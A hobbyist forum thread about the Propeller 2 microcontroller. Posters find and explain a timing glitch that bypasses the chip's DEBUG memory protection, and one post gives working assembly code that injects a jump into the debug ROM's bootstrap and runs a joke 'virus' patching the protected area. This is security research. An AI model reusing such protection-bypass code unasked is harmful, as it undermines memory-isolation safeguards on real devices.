Yes-a-silicon-bug: Bypassing DEBUG protection

Wuerfel_21 · 2024-08-15 14:41

(Original topic title: Not-a-silicon-bug: FIFO writes do not bypass DEBUG protection - crazy hack further down)

Just a random thing I was thinking about: Can the DEBUG memory protection be bypassed by setting up the FIFO to write into debug RAM and then executing BRK?

Apparently not! It seems that the FIFO/streamer continue running in the background while the debugger is active, but cannot write to debug RAM. I don't think this is documented anywhere. (@cgracey ?)

I might need to check what happens if the FIFO is started from within the debugger.

Here's some code that attempts to write a jump instruction into the debug handler, but it doesn't work like that:

_CLKFREQ = 100_000_000

PUB main()
pr0 := (%1111_1101100_0 << 20) + @haxx
pr1 := $FF840 + (cogid()^15)<<7
'pr1 := @test_buffer
pr2 := negx

org

  '' uncomment to trigger payload manually
  'jmp pr0

  wrpin #P_REPOSITORY,#0 addpins 3
  drvl #0 addpins 3
  nop
  nop
  wxpin pr0,#0
  shr pr0,#8
  wxpin pr0,#1
  shr pr0,#8
  wxpin pr0,#2
  shr pr0,#8
  wxpin pr0,#3

  setscp #64
  waitx #128
  getscp pr0

  wrfast #1,pr1
  setxfrq ##$1000_0000
  xinit ##X_4ADC8_0P_4DAC8_WFLONG|X_WRITE_ON|$FFFF,#0
  brk #1

end
debug(uhex_long(pr0,pr1))

debug("Pink fluffy unicorns dancing on Rainbows! The world is alright!",uhex_long_array(pr1,16),uhex_long(pr0,pr1))


DAT

              orgh
test_buffer   long 0[16]

              orgh
haxx
              loc ptra,#pwntext
.loop
              rdbyte pr0,ptra++ wz
.stop   if_z  jmp #.stop
.wait         rdpin pr1,#62 wc
        if_c  jmp #.wait
              drvl #62
              wypin pr0,#62
              jmp #.loop


pwntext byte "APPARITIONS STALK THE NIGHT AND ALL IS LOST!",10,13,0
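
For reference, the pr1 expression in the listing above can be checked on a host machine. This is only a minimal Python sketch, assuming Spin2's precedence rules (shift binds tighter than addition, so the expression reads as $FF840 + ((cogid()^15)<<7)); the function name isr_address is made up for illustration. For cog 0 it gives $FFFC0, which matches the address quoted later in the thread for the 16 bootstrap longs.

```python
def isr_address(cog_id: int) -> int:
    """Evaluate $FF840 + ((cog_id ^ 15) << 7).

    ASSUMPTION: Spin2 evaluates the shift before the addition, so the
    parentheses are written out explicitly here (Python would otherwise
    add first and shift second).
    """
    return 0xFF840 + ((cog_id ^ 15) << 7)


if __name__ == "__main__":
    # Print the target address for each of the eight cogs.
    for cog in range(8):
        print(f"cog {cog}: ${isr_address(cog):05X}")
```

Each cog's target is $80 bytes below the previous one, so the per-cog windows stack downwards from the top of hub RAM.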

evanh · 2024-08-15 18:19

My guess is the debug area will be writeable by the matching FIFO of the cog that has write access at the time. The moment that cog exits debug then the write access is removed for its FIFO too.

Wuerfel_21 · 2024-08-15 18:21

That's what happens here, but no. There's only one cog active. By playing with the streamer parameters, you can see that it runs while the DEBUG interrupt is active (leaving the ORG/END section will kill it), but still can't write into the debug area.

evanh · 2024-08-15 18:30

Actually, all DEBUG()'s are a hubexec. The FIFO is reloaded before the write protect gets removed. I don't think you can test this.

I presume any streamer writes will vanish when the FIFO is configured as RDFAST. Although, those writes may possibly still cycle as a RFLONG and advance the FIFO, crashing the cog.

Wuerfel_21 · 2024-08-15 18:38

No, the debugger is specifically designed to not use hubexec because it can't reset the FIFO into just the right state (that really should have been fixed instead, it'd be really useful to start the FIFO part-way into a block). As said, the streamer actually keeps running, which I verified empirically: try setting the XFREQ to a low-ish value. Without the BRK it will only fill a few slots of the buffer because the END will kill it, but with the BRK it keeps running for a couple hundred cycles while the debugger prints to the serial port.

My theory is that there's an extra signal that's only enabled when doing a regular synchronous WRxxxx instruction while in debug mode that overrides the memory protection.

evanh · 2024-08-15 18:42

I guess that shows how little attention I've paid to DEBUG.

Wuerfel_21 · 2024-08-15 18:43

Oh, another way to prove the FIFO keeps running during DEBUG is to set XFREQ to $8000_0000 and the streamer op to infinite length ($FFFF), as that will completely stall out the ROM's attempt to save $000..$00F and thus hang the CPU.
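
To put the two XFREQ values used in this thread side by side, here is a rough Python sketch. It rests on an assumption that is not stated in the thread: that the streamer NCO convention is "$8000_0000 means one transfer per system clock", with smaller values scaling linearly. The function names are hypothetical. Under that assumption, $1000_0000 is one long every 8 clocks, while $8000_0000 is one long every clock, which would fit the observation that the latter leaves no hub bandwidth for the ROM's register save.

```python
CLKFREQ = 100_000_000  # _CLKFREQ from the listings in this thread


def transfers_per_clock(xfrq: int) -> float:
    # ASSUMPTION: $8000_0000 corresponds to exactly one streamer
    # transfer per system clock, and the rate scales linearly below that.
    return xfrq / 0x8000_0000


def longs_per_second(xfrq: int, clkfreq: int = CLKFREQ) -> float:
    # In the WFLONG mode used above, each transfer writes one long.
    return transfers_per_clock(xfrq) * clkfreq


if __name__ == "__main__":
    for xfrq in (0x1000_0000, 0x8000_0000):
        print(f"${xfrq:08X}: {transfers_per_clock(xfrq)} per clock, "
              f"{longs_per_second(xfrq):,.0f} longs/s")
```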

Wuerfel_21 · 2024-08-15 22:44

So here's how you actually bypass the debugger protection...

_CLKFREQ = 100_000_000
PUB main() | i
pr0 := (%1111_1101100_0 << 20) + @haxx
org
              mov 0-0,pr0
              debug("everything's fine... so far")
              mov pr0,##$80001
              rep @.hack,#1
              debug("oh no")
              wrfast #0,pr0
              setxfrq ##$8000_0000
              nop
              xinit ##X_4ADC8_0P_4DAC8_WFLONG|X_WRITE_ON|$0008,#0
              waitx #3
              rdfast ##negx,#0
.hack
end

repeat
  repeat i from 0 to 100
    debug(udec(i))
    waitms(1000)

DAT
              orgh
haxx
              loc ptrb,#pwntext
.loop
              rdbyte pr0,ptrb++ wz
        if_z  jmp #.stop
.wait         rdpin pr1,#62 wc
        if_c  jmp #.wait
              drvl #62
              wypin pr0,#62
              jmp #.loop
.stop
              ' install resident "virus".
              loc ptrb,#\$FC000
.infectloop   rdlong pr0,ptrb++
              cmp pr0,##812085059 wz      ' 812085059 = $30676F43 = "Cog0" (little-endian ASCII)
        if_nz jmp #.infectloop
              setbyte pr0,#72,#0          ' 72 = "H", so the long now reads "Hog0"
              wrlong pr0,ptrb[-1]

              brk #$10 ' re-enable debugger
              jmp #$1FD ' leave ISR

pwntext byte 79,73,78,75,32,79,73,78,75,32,77,79,84,72,69,82,70,82,73,67,75,69,82,33,10,13,0

Try running it for yourself! (only tested with flexspin)

Do I need a CVE for this? :P
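
The magic number in .infectloop is easier to read as text. The following Python sketch decodes it and models the SETBYTE that follows; the helper names are made up, and setbyte here is only a host-side model of "replace byte N of a long". What the matched long is used for inside the debugger area is not stated in the post; presumably it is part of a string the debugger prints.

```python
MAGIC = 812085059  # constant compared against in .infectloop


def as_ascii(value: int) -> str:
    """Interpret a 32-bit value as four little-endian ASCII characters."""
    return value.to_bytes(4, "little").decode("ascii")


def setbyte(value: int, byte: int, index: int) -> int:
    """Host-side model of SETBYTE: replace byte `index` of a 32-bit value."""
    shift = 8 * index
    cleared = value & ~(0xFF << shift) & 0xFFFFFFFF
    return cleared | ((byte & 0xFF) << shift)


if __name__ == "__main__":
    patched = setbyte(MAGIC, 72, 0)
    print(f"${MAGIC:08X} -> {as_ascii(MAGIC)!r}")
    print(f"${patched:08X} -> {as_ascii(patched)!r}")
```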

evanh · 2024-08-16 08:19

Okay, I don't see how "haxx" gets run. I can tell the program size is important. If I change it then it stops working. I can see PR0 is initialised with a JMP #\ op-code and the address of haxx, but then the very first Pasm instruction MOV 0-0,pr0 doesn't make sense to me. Is it somehow used by the following DEBUG()?

Wuerfel_21 · 2024-08-16 09:09

The overall size shouldn't matter, it's just that every instruction here is load-bearing (including both DEBUG()s). The value placed in register zero is used by the "oh no" DEBUG, which is why you don't see that string printed.
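
The long that ends up in register zero can be reproduced on a host machine. This is a minimal Python sketch: the field reading in the comments (condition bits, opcode, relative flag, 20-bit address) is an interpretation consistent with the "JMP #\" remark above rather than something spelled out in the thread, and HAXX_EXAMPLE is a hypothetical address, since the real value of @haxx depends on the build.

```python
# Same bit pattern as in main(): %1111_1101100_0 << 20
# ASSUMED field reading: 1111 = always execute, 1101100 = JMP opcode,
# trailing 0 = absolute (not relative) 20-bit address follows.
JMP_ABS_TEMPLATE = 0b1111_1101100_0 << 20

HAXX_EXAMPLE = 0x01234  # hypothetical hub address standing in for @haxx


def make_jump(target: int) -> int:
    """Build the long that main() stores in pr0 for a given target address."""
    return JMP_ABS_TEMPLATE + target


if __name__ == "__main__":
    word = make_jump(HAXX_EXAMPLE)
    print(f"template: ${JMP_ABS_TEMPLATE:08X}")
    print(f"jump:     ${word:08X}")
    print(f"target:   ${word & 0xFFFFF:05X}")
```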

evanh · 2024-08-16 09:47

I have no idea how the debug()'s can do that. How come I can't remove the NOP?

Wuerfel_21 · 2024-08-16 10:04

It's a load-bearing NOP. Though you can replace it with another 2-cycle instruction of choice. (I arrived at the correct timing for this by trial and error, don't know why it needs those cycles, but it sure does)

evanh · 2024-08-16 10:41

I still have no idea how "haxx" is launched.

Wuerfel_21 · 2024-08-16 10:47

Check the silicon doc for "Debug ROM" and take a good gander at what it does.

evanh · 2024-08-16 10:50

And what is "negx"?

Wuerfel_21 · 2024-08-16 11:12

Predefined constant for $80000000

Wuerfel_21 · 2024-08-16 16:39

I'm home again, so here's the mystery revealed...

The aforementioned debug ROM. It saves the first 16 registers and then loads 16 debugger bootstrap instructions into their place.

The theory of the exploit is based on the observation that asynchronous RDFASTs can interfere with regular RDLONG/WRLONG type instructions. In fact, it's very easy to observe that something simple like

rdfast ##negx,#0
debug("something")

is likely to corrupt the register saving (seemingly by cancelling it altogether - remember that). TODO: Does this mean you can never reliably single-step over RDFAST instructions?

However, by the time the ROM gets to loading the code, the FIFO has finished loading and no glitch occurs. Two methods are used to extend the time spent loading the FIFO while in DEBUG mode:

REP stalls interrupts, so using DEBUG/BRK within a REP block causes the debug interrupt to be delayed until directly after the last instruction in the REP block, as if that instruction itself was the BRK.
The FIFO has to flush all write data before it can switch into read mode, so the streamer is used to fill up the write FIFO just before starting the RDFAST.

This delays the FIFO startup enough to interfere with the code read, which causes $000 to not be loaded from hubRAM, keeping its previous value. By making this a jump instruction, arbitrary user code can be executed in debug mode. If you wanted to make an "invisible" version of this, you could load the 16 longs from $FFFC0 manually and jump into them, which would cause the interrupt to continue as usual.

The last piece of the puzzle then is the "everything's fine... so far" DEBUG. This is load-bearing because the ROM's register save also gets glitched. In effect this causes the previous values to persist in RAM, so simply doing a normal DEBUG before the exploit allows the saved registers to be correctly restored after the injected exploit code.

This also leads to the realization that if you change IJMP0 to point to custom code that doesn't immediately do hub access, this glitch won't work. (But that custom code would need to either be in memory that's writable anyways, or be hubexec in the debugger area, destroying FIFO state.)

evanh · 2024-08-16 19:16

Oh, man, I'd blanked out that finding. It was traumatising! O_o

I've just been going over it again. I couldn't believe it would be a cancelling effect but that's looking to be what's going on. Sort of.

Adding a timer to the old test code sure enough reveals that the RDBYTE that gets screwed over is executing in less than 9 sysclock ticks. It's still sticking to its hubRAM slice but is short by a whole rotation.

evanh · 2024-08-16 20:00

@Wuerfel_21 said:
Does this mean you can never reliably single-step over RDFAST instructions?

Only for the non-blocking prefetch period. A normal RDFAST #0,addr doesn't have a problem.

Wuerfel_21 · 2024-08-16 20:41

Of course. Though it should still work in most cases (for single-step specifically), since RDFAST doesn't change any registers, so the previous ones should be fine. You'd have to be combining it with an autoincrementing ALTx where the counter is in a low register.

Rayman · 2024-08-17 00:46

Seems p2 needs some errata after all

Genetix · 2024-08-31 21:45

Rayman,

As an EE friend of mine says, "There is no perfect hardware and there is no perfect software."
